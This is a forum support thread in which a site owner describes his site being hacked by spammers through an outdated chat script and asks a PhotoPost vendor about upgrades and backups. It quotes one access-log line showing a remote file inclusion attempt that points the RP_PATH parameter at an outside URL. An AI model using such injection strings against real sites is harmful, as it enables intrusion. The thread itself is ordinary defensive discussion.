Hacked by spammers - any advice welcome!

[caliman]

Chuck I tried to send you a pm about this...

Victim of code injection...
showmembers.php, index.php etc...

I am in over my head.

Any help would be greatly appreciated - perhaps efforts here will help the community as a whole.

[Chuck S]

Well what do you mean by this please explain. To our knowledge our scripts have been checked by a security company and we are aware of no issues. We only typecast certain variables so I would need some explicit information here on your site where the issue is etc to determine your issue and where it has come from.

[caliman]

Glad to hear it... from what I can tell most of my problems came from an old version of flashchat that was exploited. THey jacked my mail server to send out spam. A LOT of spam.

I have upgraded everything including my php from 4.4.7 to 5.2.2...

I still see things in my access logs like this:

"GET /reviews/index.php?RP_PATH=http://intranet.etc/sometextfile.txt


The RP_PATH stuff was fixed a long time ago right?

Just want to make sure before I turn on the lights!

Thanks.

[Chuck S]

Yes the $RP_PATH thing was fixed years ago those are just people trying to exploit it still

Flashchat yep that is about the number one hacked program I have heard about over the years.

[caliman]

Yes and when I asked the chat developer via email if the new version addressed XSS exploits he immediately replied and said 'it addressed all known issues.'

When I told him I was hacked because of it and said no hard feelings, any advise for me, he no longer replied. So bye bye chat.

By the way Chuck, this whole experience has had me wise up about security. I want to back up my whole site better. One thing I am stuck on is the data folder for photos, reviews, etc... I keep my images there and out of the database - I think it's that folder right? Well anyway, you are probably better at unix than I, what is the best way to zip the photos up so I can download them?

Sincerely,

matt

[Chuck S]

To backup Photopost you backup the entire folder and files and also backup your database.

http://www.gnu.org/software/gzip/manual/gzip.html

You can ask your server host what they recommend is the best utility they have on that specific server. You can only do command line if you have SSH access otherwise you need to do a normal ftp backup.

[caliman]

Thanks Chuck.